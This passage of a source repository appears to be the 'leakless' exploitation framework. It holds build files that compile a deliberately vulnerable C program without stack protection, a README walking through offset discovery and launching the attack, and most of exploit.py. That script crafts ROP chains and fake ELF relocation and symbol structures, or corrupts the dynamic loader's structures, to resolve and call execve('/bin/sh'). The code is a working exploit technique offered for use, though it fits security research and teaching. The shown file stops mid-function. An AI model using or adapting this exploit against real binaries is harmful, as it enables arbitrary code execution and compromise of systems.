├── .gitignore ├── CMakeLists.txt ├── README.md ├── exploit.py ├── memory.py ├── plugins ├── CommonGadgetsExploit.py ├── RawDumperExploit.py └── __init__.py ├── rangeset.py ├── utils.py └── vuln.c /.gitignore: -------------------------------------------------------------------------------- 1 | *.idb 2 | *.o 3 | *.pyc 4 | *.gdb_history 5 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 2.6) 2 | project(leakless) 3 | 4 | set(VULN vuln.c) 5 | set(EXPLOIT exploit.py) 6 | 7 | # Compiler flags 8 | # ============== 9 | 10 | # Global flags 11 | # ------------ 12 | 13 | set(CMAKE_C_FLAGS "-fno-stack-protector -O2") 14 | set(CMAKE_SHARED_LIBRARY_LINK_C_FLAGS "") 15 | 16 | # Architectures and related options 17 | # --------------------------------- 18 | 19 | set(ARCHITECTURES "x86;x86-64" CACHE STRING "List of architectures to enable") 20 | 21 | if ("${CMAKE_C_COMPILER_ID}" STREQUAL "Clang") 22 | set(INTEL_FLAVOR "-mllvm --x86-asm-syntax=intel") 23 | elseif ("${CMAKE_C_COMPILER_ID}" STREQUAL "GNU") 24 | set(INTEL_FLAVOR "-masm=intel") 25 | endif() 26 | 27 | set(x86_FLAGS "${INTEL_FLAVOR} -m32") 28 | set(x86_OFFSET "112") 29 | 30 | set(x86-64_FLAGS "${INTEL_FLAVOR} -m64") 31 | set(x86-64_OFFSET "120") 32 | 33 | # Build types and related options 34 | # ------------------------------- 35 | 36 | set(BUILD_TYPES no_relro partial_relro full_relro) 37 | 38 | set(NO_RELRO_FLAGS "") 39 | set(PARTIAL_RELRO_FLAGS "-Wl,-z,relro") 40 | set(FULL_RELRO_FLAGS "-Wl,-z,relro,-z,now") 41 | 42 | # Testing 43 | # ======= 44 | 45 | enable_testing() 46 | 47 | set(TEST_TYPES craft-dl-structs ld-corrupt) 48 | 49 | set(TEST_FLAGS_craft-dl-structs "--method=craft-dl-structs") 50 | set(TEST_FLAGS_ld-corrupt "--method=ld-corrupt -l 1") 51 | 52 | # List of tests expected to fail 53 | # ------------------------------ 54 | 55 | set(EXPECTED_TO_FAIL test-craft-dl-structs-vuln-x86-full_relro test-craft-dl-structs-vuln-x86-64-full_relro) 56 | 57 | # Helper library 58 | # ============== 59 | 60 | # We create a helper library to avoid issues with RELRO libcs/loaders 61 | 62 | set(HELPER_C_FILE "${CMAKE_CURRENT_BINARY_DIR}/helper.c") 63 | file(WRITE "${HELPER_C_FILE}" "int return42() { return 42; }") 64 | foreach(ARCHITECTURE ${ARCHITECTURES}) 65 | set(TARGET_NAME "helper-${ARCHITECTURE}") 66 | add_library("${TARGET_NAME}" SHARED "${HELPER_C_FILE}") 67 | set_target_properties("${TARGET_NAME}" PROPERTIES 68 | COMPILE_FLAGS "${${ARCHITECTURE}_FLAGS}" 69 | LINK_FLAGS "${${ARCHITECTURE}_FLAGS}") 70 | endforeach(ARCHITECTURE) 71 | 72 | # Create targets 73 | # ============== 74 | 75 | add_custom_target(length) 76 | add_custom_target(json) 77 | add_custom_target(ropl) 78 | 79 | foreach(ARCHITECTURE ${ARCHITECTURES}) 80 | foreach(BUILD_TYPE ${BUILD_TYPES}) 81 | 82 | # Binaries 83 | # -------- 84 | 85 | set(TARGET_NAME "vuln-${ARCHITECTURE}-${BUILD_TYPE}") 86 | string(TOUPPER "${BUILD_TYPE}" TYPE_PREFIX) 87 | add_executable("${TARGET_NAME}" "${VULN}") 88 | target_link_libraries("${TARGET_NAME}" "helper-${ARCHITECTURE}") 89 | set_target_properties("${TARGET_NAME}" PROPERTIES 90 | COMPILE_FLAGS "${${ARCHITECTURE}_FLAGS} ${${TYPE_PREFIX}_FLAGS}" 91 | LINK_FLAGS "${${ARCHITECTURE}_FLAGS} ${${TYPE_PREFIX}_FLAGS}") 92 | 93 | # Tests 94 | # ----- 95 | 96 | foreach(TEST_TYPE ${TEST_TYPES}) 97 | set(TEST_NAME "test-${TEST_TYPE}-${TARGET_NAME}") 98 | set(TEST_FLAGS "${TEST_FLAGS_${TEST_TYPE}}") 99 | # Invoke the exploit 100 | set(EXPLOIT_INVOCATION "${CMAKE_SOURCE_DIR}/${EXPLOIT} ${TEST_FLAGS} --offset ${${ARCHITECTURE}_OFFSET} $") 101 | # Command to execute and check of correctness 102 | set(TEST_INVOCATION "(${EXPLOIT_INVOCATION}; echo '/bin/bash -c \"base64 -d <<< UGFzc2VkCg==\"') | $ | grep -E '^Passed$'") 103 | 104 | # If we expect failure of this test, negate the exit result 105 | list(FIND EXPECTED_TO_FAIL "${TEST_NAME}" EXPECTED_TO_FAIL_INDEX) 106 | if (NOT EXPECTED_TO_FAIL_INDEX EQUAL -1) 107 | set(TEST_INVOCATION "! (${TEST_INVOCATION})") 108 | endif() 109 | 110 | # Add the test 111 | add_test(NAME "${TEST_NAME}" COMMAND /bin/sh -c "${TEST_INVOCATION}") 112 | 113 | # Add the target to have the length 114 | set(TARGET_LEGTH_NAME "length-${TEST_TYPE}-${TARGET_NAME}") 115 | add_custom_target("${TARGET_LEGTH_NAME}" COMMAND /bin/sh -c "${EXPLOIT_INVOCATION} --size") 116 | add_dependencies(length "${TARGET_LEGTH_NAME}") 117 | 118 | add_custom_command(OUTPUT "${TEST_TYPE}-${TARGET_NAME}.json" 119 | COMMAND /bin/sh -c "${EXPLOIT_INVOCATION} -o json" > ${TEST_TYPE}-${TARGET_NAME}.json) 120 | add_custom_target("json-${TEST_TYPE}-${TARGET_NAME}" DEPENDS "${TEST_TYPE}-${TARGET_NAME}.json") 121 | add_dependencies(json "json-${TEST_TYPE}-${TARGET_NAME}") 122 | 123 | add_custom_command(OUTPUT "${TEST_TYPE}-${TARGET_NAME}.ropl" 124 | COMMAND /bin/sh -c "${EXPLOIT_INVOCATION} -o ropl" > ${TEST_TYPE}-${TARGET_NAME}.ropl) 125 | add_custom_target("ropl-${TEST_TYPE}-${TARGET_NAME}" DEPENDS "${TEST_TYPE}-${TARGET_NAME}.ropl") 126 | add_dependencies(ropl "ropl-${TEST_TYPE}-${TARGET_NAME}") 127 | 128 | endforeach(TEST_TYPE) 129 | 130 | endforeach(BUILD_TYPE) 131 | endforeach(ARCHITECTURE) 132 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | How to test 2 | =========== 3 | 4 | 1. Build vuln.c 5 | 6 | gcc -fno-stack-protector vuln.c -o /tmp/vuln -m32 -O2 7 | 8 | 2. Find the offset of the saved IP 9 | 10 | ruby19 "$METASPLOIT/tools/pattern_create.rb" 256 | /tmp/vuln 11 | dmesg | tail 12 | ruby19 "$METASPLOIT/tools/pattern_offset.rb" $SEGFAULT_IP 13 | 14 | 3. Launch the attack with the desired parameter 15 | 16 | (python ./exploit.py /tmp/vuln --offset $OFFSET; echo ls) | /tmp/vuln 17 | 18 | You can also just dump to a JSON file all the necessary information to 19 | perform the exploit: 20 | 21 | python ./exploit.py /tmp/vuln --json 22 | 23 | For debugging information, use the `--debug` parameter. For further 24 | information on the parameters use the `--help` parameter. 25 | 26 | The CMake build system will compile `vuln.c` for x86 and x86-64 with 27 | different protections enabled. There's also a CTest testsuite which 28 | has been tested using the `ld.gold` linker and GCC 4.8.4. Different 29 | toolchains might require minor adjustments. 30 | 31 | To launch it just run: 32 | 33 | mkdir leakless-build 34 | cd leakless-build 35 | cmake ../leakless 36 | make 37 | make test 38 | 39 | The build system has also the `length`, `json` and `ropl` targets 40 | which, respectively, produce the length of the generated exploit for 41 | each supported configuration and the JSON and ropl version of the 42 | exploit. 43 | 44 | make length 45 | make json 46 | make ropl 47 | 48 | Basic idea 49 | ========== 50 | 51 | char *buffer = .bss; 52 | char *new_stack = buffer + 1024; 53 | int *rubbish = new_stack + 4; 54 | 55 | strcpy(buffer, "execve"); 56 | *((int *) buffer) = 'exec'; 57 | *(((int *) buffer) + 1) = 've\0\0'; 58 | char *name = buffer; 59 | buffer += strlen(buffer) + 1; 60 | 61 | Elf32_Sym *symbol = (Elf32_Sym *) buffer; 62 | symbol->st_name = name - .dynstr; 63 | symbol->st_value = 0; 64 | symbol->st_info = 0; 65 | symbol->st_other = 0; 66 | symbol->st_shndx = 0; 67 | buffer += sizeof(*symbol); 68 | 69 | Elf32_Rel *reloc = (Elf32_Rel *) buffer; 70 | reloc->r_offset = rubbish++; 71 | reloc->r_info = (R_386_JUMP_SLOT | (symbol - .dynsym) / sizeof(symbol)); 72 | buffer += sizeof(reloc): 73 | 74 | pre_plt((reloc - .rel.plt) / sizeof(Elf32_Rel)); 75 | 76 | Helper classes 77 | ============== 78 | 79 | * `MemoryArea`: data structure representing a part of memory, with its 80 | start address, its size, a reference to what its relative to 81 | (e.g. the `MemoryArea` where we'll write the relocation structure 82 | will be relative to the `.rela.dyn` section). `MemoryArea` also 83 | takes care of computing the appropriate index (`MemoryArea.index`) 84 | relative to the specified part of memory. 85 | * `Buffer`: data structure holding information about a buffer where we 86 | want to write to things. Typically this will represent to 87 | `.bss`. Buffer also keeps track of what part of it has already been 88 | allocated (`Buffer.current` points to the next free location) and 89 | allows to allocate new `MemoryArea`s with the appropriate 90 | alignement. 91 | 92 | `Exploit`-derived classes 93 | ========================= 94 | 95 | * `Exploit`: the base class, contains all the architecture- and 96 | platform-independent parts of the exploit. It keeps the list of the 97 | gadgets, it takes care of collecting all the interesting information 98 | about the program from the ELF file and abstracting some utility and 99 | memory-related functions (e.g. `write_pointer` and `write_string`) 100 | which rely on the abstract `do_writemem` function (which is 101 | platform- and program-dependent). Finally, in `jump_to`, contains 102 | the core logic for setting up the necessary data structures in the 103 | buffers. 104 | * `CommonGadgetsExploit`: inherits from `Exploit` and introduces 105 | architecture-dependent parts, in particular gadgets and 106 | function-invocation logic. 107 | * `ExecveExploit`: very simple class implementing the logic to launch 108 | an `execve`, so write a `NULL` pointer, a `"/bin/sh\0"` and 109 | explicitly look for `execve`. Finally invoke it. 110 | * `RawDumperExploit`: exploit useful to just collect the information 111 | necessary to perform the attack without actually generating the ROP 112 | chain. `RawDumperExploit.jump_to` will return as first result an 113 | array of tuples `(address, what_to_write_there)`, which, for 114 | instance, are used to implement the `--json` parameter. 115 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import sys 5 | import glob 6 | import json 7 | import argparse 8 | import operator 9 | import struct 10 | import importlib 11 | 12 | import elftools.elf.structs 13 | from elftools.elf.elffile import ELFFile 14 | from elftools.elf.relocation import RelocationSection 15 | from elftools.elf.sections import SymbolTableSection 16 | from elftools.elf.constants import P_FLAGS, SH_FLAGS 17 | from elftools.elf.enums import ENUM_E_TYPE, ENUM_D_TAG 18 | 19 | from itertools import izip 20 | from operator import attrgetter 21 | from collections import namedtuple 22 | 23 | from rangeset import RangeSet 24 | 25 | import utils 26 | from utils import * 27 | from memory import * 28 | 29 | ElfN_Versym_size = 2 30 | DF_BIND_NOW = 0x8 31 | DF_1_NOW = 0x1 32 | 33 | relocation_types = { 34 | "EM_386": 7, 35 | "EM_X86_64": 7, 36 | "EM_ARM": 22 37 | } 38 | 39 | # `ExploitInfo` 40 | # * `prepare`: information on how to prepare the memory for the exploit 41 | # * `reloc_index`: the index to pass to `dl_resolve` 42 | # * `l_struct`: a *pointer* to a memory area containing a pointer to the `l` 43 | # structure used by the `dl_resolve` 44 | # * `dl_resolve`: a *pointer* to a memory area containing a pointer to the 45 | # `dl_resolve` function 46 | # * `plt0`: the address of the first entry of the .plt which will call 47 | # `_dl_runtime_resolve` 48 | ExploitInfo = namedtuple("ExploitInfo", ["prepare", "reloc_index", "l_struct", 49 | "dl_resolve", "plt0", "function_name_area"]) 50 | 51 | class Exploit: 52 | __slots__ = "arch", "little", "pointer_size", "dynstr", "dynsym", \ 53 | "relplt", "plt", "filler", "relocation_type", \ 54 | "dynamic", "versym", "gadgets", "fini" 55 | 56 | def __init__(self): 57 | self.gadgets = {} 58 | self.empty_exploit = lambda: "" 59 | self.badchars = [] 60 | 61 | def allocate_helpers(self, buffer): 62 | return "" 63 | 64 | def add_gadget(self, architecture, name, info, gadget): 65 | """Adds a gadget to the collection of gadgets for the specified architecture.""" 66 | if architecture not in self.gadgets: 67 | self.gadgets[architecture] = {} 68 | self.gadgets[architecture][name] = (info, gadget) 69 | 70 | def get_gadget(self, name): 71 | """Returns the gadget with the specified name for the current architecture""" 72 | return self.gadgets[self.arch][name] 73 | 74 | # TODO: split this, not everyone needs everything 75 | def config_from_elf(self, path): 76 | """Load all the necessary information about the program parsing the ELF 77 | headers. Furthermore, check some pre-requisites for the exploit to be 78 | successful.""" 79 | executable_file = open(path, "r") 80 | elf = ELFFile(executable_file) 81 | get_section = lambda name: first_or_none(filter(lambda section: section.name == name, elf.iter_sections())) 82 | get_section_address = lambda section: None if (get_section(section) is None) else get_section(section).header.sh_addr 83 | 84 | # Checks 85 | if elf.header.e_type == ENUM_E_TYPE["ET_EXEC"]: 86 | raise Exception("Only non-PIE executables are supported") 87 | 88 | # Binary type 89 | self.arch = elf.header.e_machine 90 | self.little = elf.little_endian 91 | self.pointer_size = elf.elfclass / 8 92 | self.pointer_format = ("0x%." + str(self.pointer_size * 2) + "x") 93 | self.structs = elftools.elf.structs.ELFStructs(self.little, self.pointer_size * 8) 94 | 95 | # Useful sections 96 | self.sections = {section.name: (section.header.sh_addr, section.header.sh_addr + section.header.sh_size) for section in elf.iter_sections()} 97 | self.plt = get_section_address(".plt") 98 | self.got = get_section_address(".got") 99 | self.gotplt = get_section_address(".got.plt") 100 | 101 | # Dynamic section 102 | dynamic_section = get_section(".dynamic") 103 | self.writable_dynamic = dynamic_section.header.sh_flags & SH_FLAGS.SHF_WRITE 104 | self.dynamic = dynamic_section.header.sh_addr 105 | dynamic_entries = [self.structs.Elf_Dyn.parse(dynamic_entry) 106 | for dynamic_entry in 107 | chunks(dynamic_section.data(), self.structs.Elf_Dyn.sizeof())] 108 | 109 | # Dynamic symbols 110 | # TODO: we're relying on section names here 111 | symbol_table = elf.get_section_by_name(".dynsym") 112 | has_name = lambda name: lambda symbol: symbol.name == name 113 | attribute_or_default = lambda default, attribute, x: getattr(x, attribute) if x is not None else default 114 | memcpy_symbol = first_or_none(filter(has_name("memcpy"), symbol_table.iter_symbols())) 115 | self.memcpy_plt = 0 if memcpy_symbol is None else memcpy_symbol.entry.st_value 116 | 117 | # We try not to rely on section names 118 | get_dynamic = lambda name: first_or_none(map(lambda entry: entry.d_val, filter(lambda entry: entry.d_tag == name, dynamic_entries))) 119 | get_dynamic_index = lambda name: filter(lambda entry: entry[1].d_tag == name, enumerate(dynamic_entries))[0][0] 120 | self.dynstr = get_dynamic("DT_STRTAB") 121 | self.dynsym = get_dynamic("DT_SYMTAB") 122 | self.versym = get_dynamic("DT_VERSYM") 123 | self.verneed = get_dynamic("DT_VERNEED") 124 | self.relplt = get_dynamic("DT_JMPREL") 125 | self.addend = get_dynamic("DT_RELA") is not None 126 | self.dt_debug = self.dynamic + get_dynamic_index("DT_DEBUG") * self.structs.Elf_Dyn.sizeof() + self.pointer_size 127 | self.full_relro = (get_dynamic("DT_FLAGS") is not None) and \ 128 | ((get_dynamic("DT_FLAGS") & DF_BIND_NOW) != 0) 129 | self.full_relro = self.full_relro or ((get_dynamic("DT_FLAGS_1") is not None) and \ 130 | ((get_dynamic("DT_FLAGS_1") & DF_1_NOW) != 0)) 131 | 132 | # Choose between Elf_Rel and Elf_Rela depending on the architecture 133 | self.rel_struct = self.structs.Elf_Rela if self.addend else self.structs.Elf_Rel 134 | 135 | # Looks like 64-bit and 32-bit have different alignment for the call to _dl_fixup 136 | self.reloc_alignment = 1 if self.pointer_size == 4 else self.rel_struct.sizeof() 137 | self.reloc_index_multiplier = self.rel_struct.sizeof() if self.pointer_size == 4 else 1 138 | 139 | # 140 | # Find candidate writeable areas 141 | # 142 | 143 | # Collect PT_LOAD segments (what gets mapped) 144 | loaded_segments = filter(lambda segment: segment.header.p_type == "PT_LOAD", elf.iter_segments()) 145 | # Collect the segments which are writeable 146 | writeable_segments = filter(lambda segment: segment.header.p_flags & P_FLAGS.PF_W, loaded_segments) 147 | # Get their memory ranges (start, end) 148 | writeable_ranges = RangeSet.mutual_union(*map(lambda segment: (segment.header.p_vaddr, segment.header.p_vaddr + segment.header.p_memsz), writeable_segments)) 149 | 150 | # List of sections we don't want to write to 151 | dont_overwrite_sections = filter_none([self.dynstr, self.dynsym, self.versym, self.relplt, self.dynamic, self.got, self.gotplt]) 152 | # Memory ranges of the sections we don't want to write to 153 | dont_overwrite_ranges = RangeSet.mutual_union(*[self.sections[self.section_from_address(start)] for start in dont_overwrite_sections]) 154 | 155 | # Handle RELRO segment, we don't want to write there 156 | relro_segment = first_or_none(filter(lambda segment: segment.header.p_type == "PT_GNU_RELRO", elf.iter_segments())) 157 | if relro_segment is not None: 158 | dont_overwrite_ranges = dont_overwrite_ranges | RangeSet(relro_segment.header.p_vaddr, relro_segment.header.p_vaddr + relro_segment.header.p_memsz) 159 | 160 | # Compute the set of candidate memory ranges 161 | self.writeable_ranges = writeable_ranges - dont_overwrite_ranges 162 | 163 | 164 | # Save the index of the DT_FINI entry 165 | fini = filter(lambda (i, entry): entry.d_tag == "DT_FINI", enumerate(dynamic_entries)) 166 | if len(fini) > 0: 167 | self.fini = self.dynamic + self.structs.Elf_Dyn.sizeof() * fini[0][0] 168 | 169 | # Gadgets 170 | if self.gadgets.has_key(self.arch): 171 | executable_segments = filter(lambda segment: segment.header.p_flags & P_FLAGS.PF_X, elf.iter_segments()) 172 | 173 | for name, (info, gadget) in self.gadgets[self.arch].iteritems(): 174 | locations = find_all_strings(executable_segments, hex_bytes(gadget)) 175 | locations = map(self.ptr2str, locations) 176 | location = first_or_none(filter(lambda address: not reduce(lambda accumulate, badchar: badchar in address or accumulate, self.badchars , False), locations)) 177 | if location is None: 178 | self.gadgets[self.arch][name] = None 179 | else: 180 | self.gadgets[self.arch][name] = (info, gadget, location) 181 | 182 | # Find all '\x00\x00' in non-writeable segments 183 | self.non_writeable_segments = filter(lambda segment: not (segment.header.p_flags & P_FLAGS.PF_W), loaded_segments) 184 | self.zero_or_one_addresses = find_all_strings(self.non_writeable_segments, "\x00\x00") + \ 185 | find_all_strings(self.non_writeable_segments, "\x01\x00" if self.little else "\x00\x01") 186 | 187 | self.filler = self.ptr2str(reduce(lambda x,y: (x << 32) | 0xdeadb00b, xrange(1 + (self.pointer_size % 4)), 0)) 188 | self.relocation_type = relocation_types[self.arch] 189 | 190 | # 191 | # Find the reloc pointing to the symbol whose name is the earliest in .dynstr 192 | # 193 | 194 | relplt_section = elf.get_section_by_name(self.section_from_address(self.relplt)) 195 | dynsym_section = elf.get_section_by_name(self.section_from_address(self.dynsym)) 196 | 197 | if not (isinstance(relplt_section, RelocationSection) and \ 198 | isinstance(dynsym_section, SymbolTableSection)): 199 | raise Exception("Unexpect type for dynamic sections: " + str(relplt_section) + " " + str(dynsym_section)) 200 | 201 | # Grab .got.plt relocs symbol indexes 202 | symbol_indexes = [reloc.entry.r_info_sym if reloc.entry.r_info_type == self.relocation_type else None for reloc in relplt_section.iter_relocations()] 203 | # Get offsets in .dynstr 204 | names_offsets = [dynsym_section.get_symbol(index).entry.st_name if index is not None else None for index in symbol_indexes] 205 | # Filter out unamed offsets 206 | names_offsets = [offset if offset > 0 else None for offset in names_offsets] 207 | # Get the minimum value 208 | self.min_reloc_index, self.min_string_offset = min(enumerate(names_offsets), key=operator.itemgetter(1)) 209 | self.min_symbol_index = symbol_indexes[self.min_reloc_index] 210 | 211 | log(self.dump()) 212 | 213 | def get_non_writeable_segment(self, address): 214 | for non_writeable_segment in self.non_writeable_segments: 215 | start = non_writeable_segment.header.p_vaddr 216 | end = start + non_writeable_segment.header.p_memsz 217 | if (start <= address) and (address < end): 218 | return non_writeable_segment 219 | return None 220 | 221 | def read_non_writeable(self, address, size): 222 | segment = self.get_non_writeable_segment(address) 223 | if segment is None: 224 | raise Exception("Not a non-writeable address: " + hex(address)) 225 | start = segment.header.p_vaddr 226 | end = start + segment.header.p_memsz 227 | return segment.data()[address - start:address - start + size] 228 | 229 | def section_from_address(self, address): 230 | for name, section in self.sections.iteritems(): 231 | start = section[0] 232 | end = section[1] 233 | # TODO: we're excluding mappings at 0 234 | if (start > 0) and (start <= address) and ((address < end) or ((start > 0) and (end - start == 0))): 235 | return name 236 | raise Exception("Can't find a section for address " + hex(address)) 237 | 238 | def closest_section_from_address(self, address): 239 | sorted_sections = [0] + sorted([section[0] for section in self.sections.itervalues()]) + [(1 << 8 * self.pointer_size) - 1] 240 | for start, end in pairwise(sorted_sections): 241 | if (start <= address) and (address < end): 242 | return ("0" if start == 0 else self.section_from_address(start)) + " + " + hex(address - start) 243 | raise Exception("Can't find a section for address " + hex(address)) 244 | 245 | def dump(self): 246 | """Dump all the information held by this Exploit instance for debugging 247 | purposes.""" 248 | return "\n".join([slot + ": " + str(getattr(self, slot)) for slot in self.__slots__]) 249 | 250 | # Utility functions 251 | # ================= 252 | 253 | def ptr2str(self, integer): 254 | """Convert a pointer (in the form of an integer) to a byte string of its memory 255 | representation according the current architecture endianness.""" 256 | direction = "<" if self.little else ">" 257 | word_size = "Q" if self.pointer_size == 8 else "I" 258 | mask = (1 << self.pointer_size * 8) - 1 259 | return struct.pack(direction + word_size, integer & mask) 260 | 261 | def str2ptr(self, string): 262 | """Convert a byte string representing a pointer to an integer.""" 263 | direction = "<" if self.little else ">" 264 | word_size = "Q" if self.pointer_size == 8 else "I" 265 | return struct.unpack(direction + word_size, string)[0] 266 | 267 | # Abstractions to write memory 268 | # ============================ 269 | 270 | def write_all(self, start, string): 271 | if (self.memcpy_plt) and (len(string) > self.pointer_size): 272 | return self.memcpy(start, string) 273 | 274 | result = self.empty_exploit() 275 | remaining = string 276 | while len(remaining) > 0: 277 | remaining, writer = self.do_writemem(self.ptr2str(start + len(string) - len(remaining)), remaining) 278 | result += writer 279 | 280 | return result 281 | 282 | def flush(self, buffer): 283 | result = self.empty_exploit() 284 | 285 | content_buffer = "" 286 | areas = filter(attrgetter("is_buffered"), buffer.areas.values()) 287 | last_start = last_end = areas[0].start 288 | 289 | for memory_area in areas: 290 | memory_area.is_buffered = False 291 | 292 | if last_end == memory_area.start: 293 | content_buffer += memory_area.content 294 | last_end += len(memory_area.content) 295 | else: 296 | result += self.write_all(last_start, content_buffer) 297 | content_buffer = memory_area.content 298 | last_start = last_end = memory_area.start 299 | 300 | result += self.write_all(last_start, content_buffer) 301 | 302 | return result 303 | 304 | def write_string(self, memory_area, string, buffered=True): 305 | """Write an input string in the specified memory area invoking an appropriate 306 | number of times the do_writemem function.""" 307 | string_len = len(string) 308 | if string_len == 0: 309 | return self.empty_exploit() 310 | elif string_len > memory_area.size: 311 | raise Exception("You're trying to write {} bytes in a MemoryArea {} bytes wide".format(string_len, memory_area.size)) 312 | 313 | memory_area.is_buffered = buffered 314 | memory_area.content = string 315 | 316 | if not buffered: 317 | return self.write_all(memory_area.start, string) 318 | else: 319 | return self.empty_exploit() 320 | 321 | def write_pointer(self, memory_area, pointer, buffered=True): 322 | """Write a pointer (an integer) to a memory area.""" 323 | return self.write_string(memory_area, self.ptr2str(pointer), buffered) 324 | 325 | def create_relocation(self, buffer, symbol_index, align_to=None): 326 | """Create an ElfN_Rel using a writable memory area as relocation 327 | target and referencing the requested symbol index.""" 328 | 329 | reloc = buffer.allocate(self.rel_struct.sizeof(), align_to, self.reloc_alignment, name="reloc") 330 | 331 | relocation_target = buffer.allocate(self.pointer_size, name="relocation_target") 332 | 333 | # Create the Elf_Rela? structure to the exploit 334 | function_reloc = self.rel_struct.parse("\0" * self.rel_struct.sizeof()) 335 | function_reloc.r_offset = relocation_target.start 336 | function_reloc.r_info_type = self.relocation_type 337 | function_reloc.r_info_sym = symbol_index 338 | 339 | if self.pointer_size * 8 == 32: 340 | function_reloc.r_info = function_reloc.r_info_type | (function_reloc.r_info_sym << 8) 341 | else: 342 | function_reloc.r_info = function_reloc.r_info_type | (function_reloc.r_info_sym << 32) 343 | 344 | prepare = self.write_string(reloc, self.rel_struct.build(function_reloc)) 345 | 346 | return prepare, reloc 347 | 348 | class CraftDlStructsExploit(Exploit): 349 | 350 | def jump_to(self, buffer, function_name_max_length): 351 | """Craft the necessary data structures (Elf_Rela?, Elf_Sym, version index) and 352 | strings to pass to the dynamic linker.""" 353 | 354 | # Part of the ROP exploit to write the data structures 355 | exploit = self.empty_exploit() 356 | 357 | # Allocate the buffers necessary for the data structure we're going to 358 | # create 359 | function_name_str = buffer.allocate(function_name_max_length, self.dynstr, 1, name="function_name_str") 360 | 361 | # TODO: move symbol as first thing in the buffer 362 | if self.versym: 363 | to_range = lambda address, size: (address, address + size) 364 | 365 | # We have three possible constraints (in order of preference): 366 | # 1. The version index has special value 0 (local) or 1 (global) 367 | # 2. The version index falls in a memory area we can write 368 | # 3. The version index points to ElfN_Verneed structure we can write 369 | constraints = [lambda address, versym: versym in self.zero_or_one_addresses, 370 | lambda address, versym: to_range(versym, ElfN_Versym_size) in buffer.ranges, 371 | lambda address, versym: (self.get_non_writeable_segment(versym) is not None) and \ 372 | (to_range(self.verneed + self.structs.Elf_Verneed.sizeof() * self.str2ptr(self.read_non_writeable(versym, ElfN_Versym_size)), self.structs.Elf_Verneed.sizeof()) in buffer.ranges)] 373 | 374 | wrap_versym = lambda func: lambda address, index: func(address, self.versym + ElfN_Versym_size * index) 375 | constraints = map(wrap_versym, constraints) 376 | else: 377 | constraints = [lambda x,y: True] 378 | 379 | errors = 0 380 | for constraint in constraints: 381 | try: 382 | symbol = buffer.allocate(self.structs.Elf_Sym.sizeof(), self.dynsym, name="symbol", constraint=constraint) 383 | break 384 | except AllocateFailException: 385 | errors += 1 386 | pass 387 | 388 | if self.versym: 389 | if errors > 2: # We failed 390 | raise Exception("Can't find a position for the Elf_Sym") 391 | versym_address = self.versym + ElfN_Versym_size * symbol.index 392 | if errors == 1: # We can write in ElfN_Versym 393 | versym_area = buffer.allocate(ElfN_Versym_size, align_to=self.versym, start=versym_address) 394 | exploit += self.write_string(versym_area, "\x00\x00") 395 | elif errors == 2: # We can write in ElfN_Verneed 396 | verneed_address = self.verneed + self.structs.Elf_Verneed.sizeof() * self.str2ptr(self.read_non_writeable(versym_address, ElfN_Versym_size)) 397 | verneed_area = buffer.allocate(self.structs.Elf_Verneed.sizeof(), align_to=self.verneed, start=verneed_address) 398 | 399 | verneed_struct = self.structs.Elf_Verneed.parse("\0" * self.structs.Elf_Verneed.sizeof()) 400 | verneed_struct.vn_version = 1; 401 | verneed_struct.vn_cnt = 0; 402 | verneed_struct.vn_file = 0; 403 | verneed_struct.vn_aux = 0; 404 | verneed_struct.vn_next = 0; 405 | exploit += self.write_string(verneed_area, self.structs.Elf_Verneed.build(verneed_struct)) 406 | 407 | # Append the creation of the Elf_Sym structure to the exploit 408 | function_symbol = self.structs.Elf_Sym.parse("\0" * self.structs.Elf_Sym.sizeof()) 409 | function_symbol.st_name = function_name_str.index 410 | function_symbol.st_info.bind = "STB_GLOBAL" 411 | function_symbol.st_info.type = "STT_FUNC" 412 | 413 | exploit += self.write_string(symbol, self.structs.Elf_Sym.build(function_symbol)) 414 | 415 | prepare_relocation, reloc = self.create_relocation(buffer, symbol.index, align_to=self.relplt) 416 | exploit += prepare_relocation 417 | 418 | return ExploitInfo(prepare=exploit, reloc_index=reloc.index, plt0=self.plt, l_struct=None, dl_resolve=None, function_name_area=function_name_str) 419 | 420 | class CorruptLdSoExploit(Exploit): 421 | 422 | def jump_to(self, buffer, function_name_max_length): 423 | 424 | dt_strtab_offset = ENUM_D_TAG["DT_STRTAB"] * self.pointer_size 425 | l_info_offset = 8 * self.pointer_size 426 | 427 | fake_dynstr_area = buffer.allocate(self.min_string_offset, name="fake_dynstr") 428 | function_name_area = buffer.allocate(function_name_max_length, fake_dynstr_area.start, 1, name="function_name") 429 | 430 | # TODO: instead of this support for "don't care" memory areas 431 | # Allocate the DT_STRTAB dynamic entry (possibly in the fake .dynstr itself, if it fits) 432 | if fake_dynstr_area.size >= self.structs.Elf_Dyn.sizeof(): 433 | dt_strtab_entry_area = fake_dynstr_area 434 | else: 435 | dt_strtab_entry_area = buffer.allocate(self.structs.Elf_Dyn.sizeof(), name="dt_strtab_entry") 436 | 437 | exploit = self.empty_exploit() 438 | 439 | # TODO: here is not really necessary to write DT_STRTAB, no one will check that 440 | dt_strtab_entry = self.structs.Elf_Dyn.parse("\x00" * self.structs.Elf_Dyn.sizeof()) 441 | dt_strtab_entry.d_tag = "DT_STRTAB" 442 | dt_strtab_entry.d_val = fake_dynstr_area.start 443 | exploit += self.write_string(dt_strtab_entry_area, self.structs.Elf_Dyn.build(dt_strtab_entry)) 444 | 445 | if not self.full_relro: 446 | # OK, the l_pointer is just a GOT[1] and dl_resolve is in GOT[2] 447 | l_pointer = self.gotplt + self.pointer_size * 1 448 | dl_resolve_pointer = self.gotplt + self.pointer_size * 2 449 | 450 | # We can also use the plt[0] entry 451 | plt0 = self.plt 452 | reloc_index = self.min_reloc_index * self.rel_struct.sizeof() 453 | else: 454 | # We can't use GOT[1], GOT[2] or plt[0], let's work around this 455 | 456 | # We reuse a part of the buffer multiple times 457 | exe_link_map_area = buffer.allocate(self.pointer_size, name="exe_link_map") 458 | first_lib_link_map_area = buffer.allocate(self.pointer_size, name="first_lib_link_map") 459 | dyn_gotplt_area = first_lib_link_map_area # Reuse 460 | gotplt_area = dyn_gotplt_area # Reuse 461 | dl_resolve_area = gotplt_area # Reuse 462 | 463 | # Prepare fake relocation 464 | prepare_relocation, fake_relocation_area = self.create_relocation(buffer, self.min_symbol_index) 465 | exploit += prepare_relocation 466 | 467 | # TODO: factorize this 468 | 